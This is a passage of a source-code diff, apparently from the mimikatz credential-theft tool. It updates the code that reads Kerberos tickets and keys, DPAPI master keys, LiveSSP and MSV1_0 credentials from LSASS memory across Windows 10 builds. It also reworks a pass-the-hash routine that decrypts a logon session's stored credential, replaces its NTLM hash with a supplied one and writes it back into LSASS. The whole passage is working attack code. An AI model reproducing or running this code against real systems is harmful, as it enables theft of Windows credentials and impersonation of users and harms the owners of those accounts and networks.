KULL_M_MEMORY_ADDRESS aLocalMemory = {&setList, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {pData->pCredentialManager, pData->cLsass->hLsassMem};
|
||||
PVOID pRef;
|
||||
KIWI_GENERIC_PRIMARY_CREDENTIAL kiwiCreds;
|
||||
ULONG CredOffsetIndex;
|
||||
|
||||
@ -19,7 +19,7 @@ KULL_M_PATCH_GENERIC MasterKeyCacheReferences[] = {
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WI61_MasterKeyCacheList), PTRN_WI61_MasterKeyCacheList}, {0, NULL}, { 7}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WI62_MasterKeyCacheList), PTRN_WI62_MasterKeyCacheList}, {0, NULL}, {-4}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WI63_MasterKeyCacheList), PTRN_WI63_MasterKeyCacheList}, {0, NULL}, {-10}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WI64_MasterKeyCacheList), PTRN_WI64_MasterKeyCacheList}, {0, NULL}, {-7}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI64_MasterKeyCacheList), PTRN_WI64_MasterKeyCacheList}, {0, NULL}, {-7}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WALL_MasterKeyCacheList[] = {0x33, 0xc0, 0x40, 0xa3};
|
||||
@ -45,8 +45,7 @@ NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[])
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
KIWI_MASTERKEY_CACHE_ENTRY mesCredentials;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hLocalMemory}, aKey = {NULL, &hLocalMemory}, aLsass = {NULL, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aKey = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsass = {NULL, pData->cLsass->hLsassMem};
|
||||
PKUHL_M_SEKURLSA_PACKAGE pPackage = (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package;
|
||||
BYTE dgst[SHA_DIGEST_LENGTH];
|
||||
DWORD monNb = 0;
|
||||
|
||||
@ -13,7 +13,8 @@ KULL_M_PATCH_GENERIC KerberosReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 2}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 3}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 4}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 5}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 5}},
|
||||
{KULL_M_WIN_BUILD_10_1511, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 6}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WALL_KerbReferenceLogonSession[] = {0x8B, 0x7D, 0x08, 0x8B, 0x17, 0x39, 0x50};
|
||||
@ -27,7 +28,8 @@ KULL_M_PATCH_GENERIC KerberosReferences[] = {
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WNO8_KerbUnloadLogonSessionTable), PTRN_WNO8_KerbUnloadLogonSessionTable}, {0, NULL}, {-11,3}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_KerbUnloadLogonSessionTable), PTRN_WIN8_KerbUnloadLogonSessionTable}, {0, NULL}, {-14,4}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WI10_KerbUnloadLogonSessionTable), PTRN_WI10_KerbUnloadLogonSessionTable}, {0, NULL}, {-15,4}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WI10_KerbUnloadLogonSessionTable), PTRN_WI10_KerbUnloadLogonSessionTable}, {0, NULL}, {-15,5}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI10_KerbUnloadLogonSessionTable), PTRN_WI10_KerbUnloadLogonSessionTable}, {0, NULL}, {-15,5}},
|
||||
{KULL_M_WIN_BUILD_10_1511, {sizeof(PTRN_WI10_KerbUnloadLogonSessionTable), PTRN_WI10_KerbUnloadLogonSessionTable}, {0, NULL}, {-15,6}},
|
||||
};
|
||||
#endif
|
||||
|
||||
@ -210,6 +212,41 @@ const KERB_INFOS kerbHelper[] = {
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData)
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials),
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, Tickets_1),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, Tickets_2),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, Tickets_3),
|
||||
},
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, SmartcardInfos),
|
||||
sizeof(KIWI_KERBEROS_LOGON_SESSION_10),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, ServiceName),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TargetName),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, DomainName),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TargetDomainName),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, Description),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, AltTargetDomainName),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, ClientName),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TicketFlags),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, KeyType),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, Key),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, StartTime),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, EndTime),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, RenewUntil),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TicketEncType),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, Ticket),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TicketKvno),
|
||||
sizeof(KIWI_KERBEROS_INTERNAL_TICKET_6),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, pKeyList),
|
||||
sizeof(KIWI_KERBEROS_KEYS_LIST_6),
|
||||
FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
|
||||
sizeof(KERB_HASHPASSWORD_6),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData)
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials),
|
||||
@ -287,10 +324,9 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SE
|
||||
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
|
||||
DWORD szCsp;
|
||||
PBYTE infosCsp;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {*(PVOID *) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetSmartCard), pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {*(PVOID *) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetSmartCard), pData->cLsass->hLsassMem};
|
||||
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData, (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10);
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData, (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10_1507) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10);
|
||||
if(aLsassMemory.address)
|
||||
{
|
||||
if(infosCsp = (PBYTE) LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structCspInfosSize))
|
||||
@ -355,7 +391,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURIT
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
|
||||
for(i = 0; i < nbHash; i++)
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric), pData, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10)));
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric), pData, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10_1507) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10)));
|
||||
LocalFree(aLocalHashMemory.address);
|
||||
}
|
||||
}
|
||||
@ -486,8 +522,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_pth(IN PKIWI_BASIC_SECURITY
|
||||
|
||||
void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKIWI_KERBEROS_ENUM_DATA pEnumData)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
if(kuhl_m_sekurlsa_kerberos_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_kerberos_package.Module, KerberosReferences, ARRAYSIZE(KerberosReferences), &KerbLogonSessionListOrTable, NULL, NULL, &KerbOffsetIndex))
|
||||
{
|
||||
aLsassMemory.address = KerbLogonSessionListOrTable;
|
||||
@ -511,8 +546,7 @@ void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGO
|
||||
void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile)
|
||||
{
|
||||
PVOID pStruct, pRef = tickets;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS data = {&pStruct, &hBuffer}, aTicket = {NULL, &hBuffer}, aLsassBuffer = {tickets, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS data = {&pStruct, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aTicket = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassBuffer = {tickets, pData->cLsass->hLsassMem};
|
||||
DWORD nbTickets = 0;
|
||||
PKIWI_KERBEROS_TICKET pKiwiTicket;
|
||||
PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred;
|
||||
@ -533,7 +567,7 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION
|
||||
kprintf(L"\n\t [%08x]", nbTickets);
|
||||
if(pKiwiTicket = kuhl_m_sekurlsa_kerberos_createTicket((LPBYTE) aTicket.address, pData->cLsass->hLsassMem))
|
||||
{
|
||||
isNormalSessionKey = (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) || (pKiwiTicket->Key.Length < (ULONG) FIELD_OFFSET(LSAISO_DATA_BLOB, data));
|
||||
isNormalSessionKey = (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10_1507) || (pKiwiTicket->Key.Length < (ULONG) FIELD_OFFSET(LSAISO_DATA_BLOB, data));
|
||||
kuhl_m_kerberos_ticket_display(pKiwiTicket, isNormalSessionKey, FALSE);
|
||||
if(isFile)
|
||||
if(filename = kuhl_m_sekurlsa_kerberos_generateFileName(pData->LogonId, grp, nbTickets, pKiwiTicket, MIMIKATZ_KERBEROS_EXT))
|
||||
@ -634,8 +668,7 @@ void kuhl_m_sekurlsa_kerberos_createExternalName(PKERB_EXTERNAL_NAME *pExternalN
|
||||
BOOL status = FALSE;
|
||||
KERB_EXTERNAL_NAME extName;
|
||||
PKERB_EXTERNAL_NAME pTempName;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aName = {*pExternalName, hLSASS}, aLocalBuffer = {&extName, &hBuffer};//, aLocalStrings = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aName = {*pExternalName, hLSASS}, aLocalBuffer = {&extName, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
DWORD i;
|
||||
|
||||
if(aName.address)
|
||||
@ -659,8 +692,7 @@ void kuhl_m_sekurlsa_kerberos_createExternalName(PKERB_EXTERNAL_NAME *pExternalN
|
||||
void kuhl_m_sekurlsa_kerberos_createKiwiKerberosBuffer(PKIWI_KERBEROS_BUFFER pBuffer, PKULL_M_MEMORY_HANDLE hLSASS)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {pBuffer->Value, hLSASS}, aLocalBuffer = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {pBuffer->Value, hLSASS}, aLocalBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
pBuffer->Value = NULL;
|
||||
if(aBuffer.address)
|
||||
|
||||
@ -30,8 +30,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKIWI_BASIC_SECURIT
|
||||
{
|
||||
KIWI_LIVESSP_LIST_ENTRY credentials;
|
||||
KIWI_LIVESSP_PRIMARY_CREDENTIAL primaryCredential;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
|
||||
if(kuhl_m_sekurlsa_livessp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_livessp_package.Module, LiveReferences, ARRAYSIZE(LiveReferences), (PVOID *) &LiveGlobalLogonSessionList, NULL, NULL, NULL))
|
||||
{
|
||||
|
||||
@ -27,69 +27,50 @@ BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN PKUHL_M_SEKURLSA_CON
|
||||
DWORD flags = KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL;
|
||||
kprintf(L"\n\t [%08x] %Z", AuthenticationPackageId, &pCredentials->Primary);
|
||||
if(RtlEqualString(&pCredentials->Primary, &PRIMARY_STRING, FALSE))
|
||||
flags |= (cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) ? KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY : KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10;
|
||||
flags |= KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY;
|
||||
else if(RtlEqualString(&pCredentials->Primary, &CREDENTIALKEYS_STRING, FALSE))
|
||||
flags |= KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY;
|
||||
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pCredentials->Credentials, (PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA) pOptionalData, flags);
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PKIWI_MSV1_0_PRIMARY_CREDENTIALS pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) (pCredentials->Credentials.Buffer);
|
||||
PMSV1_0_PRIMARY_CREDENTIAL_10 pPrimaryCreds10 = (PMSV1_0_PRIMARY_CREDENTIAL_10) (pCredentials->Credentials.Buffer);
|
||||
PMSV1_0_PTH_DATA_CRED pthDataCred = (PMSV1_0_PTH_DATA_CRED) pOptionalData;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {pPrimaryCreds, &hLocalMemory};
|
||||
PBYTE msvCredentials;
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {pCredentials->Credentials.Buffer, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
const MSV1_0_PRIMARY_HELPER * helper = kuhl_m_sekurlsa_msv_helper(cLsass);
|
||||
|
||||
if(RtlEqualString(&pCredentials->Primary, &PRIMARY_STRING, FALSE))
|
||||
{
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaUnprotectMemory)(pCredentials->Credentials.Buffer, pCredentials->Credentials.Length);
|
||||
if(cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10)
|
||||
if(msvCredentials = (PBYTE) pCredentials->Credentials.Buffer)
|
||||
{
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaUnprotectMemory)(msvCredentials, pCredentials->Credentials.Length);
|
||||
*(PBOOLEAN) (msvCredentials + helper->offsetToisLmOwfPassword) = FALSE;
|
||||
*(PBOOLEAN) (msvCredentials + helper->offsetToisShaOwPassword) = FALSE;
|
||||
if(helper->offsetToisIso)
|
||||
*(PBOOLEAN) (msvCredentials + helper->offsetToisIso) = FALSE;
|
||||
RtlZeroMemory(msvCredentials + helper->offsetToLmOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
RtlZeroMemory(msvCredentials + helper->offsetToShaOwPassword, SHA_DIGEST_LENGTH);
|
||||
if(pthDataCred->pthData->NtlmHash)
|
||||
{
|
||||
RtlCopyMemory(pPrimaryCreds->NtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
||||
pPrimaryCreds->isNtOwfPassword = TRUE;
|
||||
*(PBOOLEAN) (msvCredentials + helper->offsetToisNtOwfPassword) = TRUE;
|
||||
RtlCopyMemory(msvCredentials + helper->offsetToNtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
||||
}
|
||||
else
|
||||
{
|
||||
RtlZeroMemory(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
pPrimaryCreds->isNtOwfPassword = FALSE;
|
||||
*(PBOOLEAN) (msvCredentials + helper->offsetToisNtOwfPassword) = FALSE;
|
||||
RtlZeroMemory(msvCredentials + helper->offsetToNtOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
}
|
||||
RtlZeroMemory(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
RtlZeroMemory(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH);
|
||||
pPrimaryCreds->isLmOwfPassword = FALSE;
|
||||
pPrimaryCreds->isShaOwPassword = FALSE;
|
||||
}
|
||||
else
|
||||
{
|
||||
if(pthDataCred->pthData->NtlmHash)
|
||||
{
|
||||
RtlCopyMemory(pPrimaryCreds10->NtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
||||
pPrimaryCreds10->isNtOwfPassword = TRUE;
|
||||
}
|
||||
else
|
||||
{
|
||||
RtlZeroMemory(pPrimaryCreds10->NtOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
pPrimaryCreds10->isNtOwfPassword = FALSE;
|
||||
}
|
||||
RtlZeroMemory(pPrimaryCreds10->LmOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
RtlZeroMemory(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH);
|
||||
pPrimaryCreds10->isIso = FALSE;
|
||||
pPrimaryCreds10->isLmOwfPassword = FALSE;
|
||||
pPrimaryCreds10->isShaOwPassword = FALSE;
|
||||
}
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pCredentials->Credentials.Buffer, pCredentials->Credentials.Length);
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(msvCredentials, pCredentials->Credentials.Length);
|
||||
|
||||
kprintf(L"data copy @ %p : ", origBufferAddress->address);
|
||||
if(pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
|
||||
kprintf(L"OK !");
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
kprintf(L"data copy @ %p : ", origBufferAddress->address);
|
||||
if(pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
|
||||
kprintf(L"OK !");
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
}
|
||||
}
|
||||
else kprintf(L".");
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
@ -110,8 +91,7 @@ VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID
|
||||
{
|
||||
KIWI_MSV1_0_CREDENTIALS credentials;
|
||||
KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {pCredentials, cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {pCredentials, cLsass->hLsassMem};
|
||||
|
||||
while(aLsassMemory.address)
|
||||
{
|
||||
@ -140,4 +120,22 @@ VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID
|
||||
aLsassMemory.address = credentials.next;
|
||||
} else kprintf(L"n.e. (KIWI_MSV1_0_CREDENTIALS KO)");
|
||||
}
|
||||
}
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER msv1_0_primaryHelper[] = {
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, UserName), 0, FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, ShaOwPassword), 0},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, align0)},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword)},
|
||||
};
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper(PKUHL_M_SEKURLSA_CONTEXT context)
|
||||
{
|
||||
const MSV1_0_PRIMARY_HELPER * helper;
|
||||
if(context->osContext.BuildNumber < KULL_M_WIN_BUILD_10_1507)
|
||||
helper = &msv1_0_primaryHelper[0];
|
||||
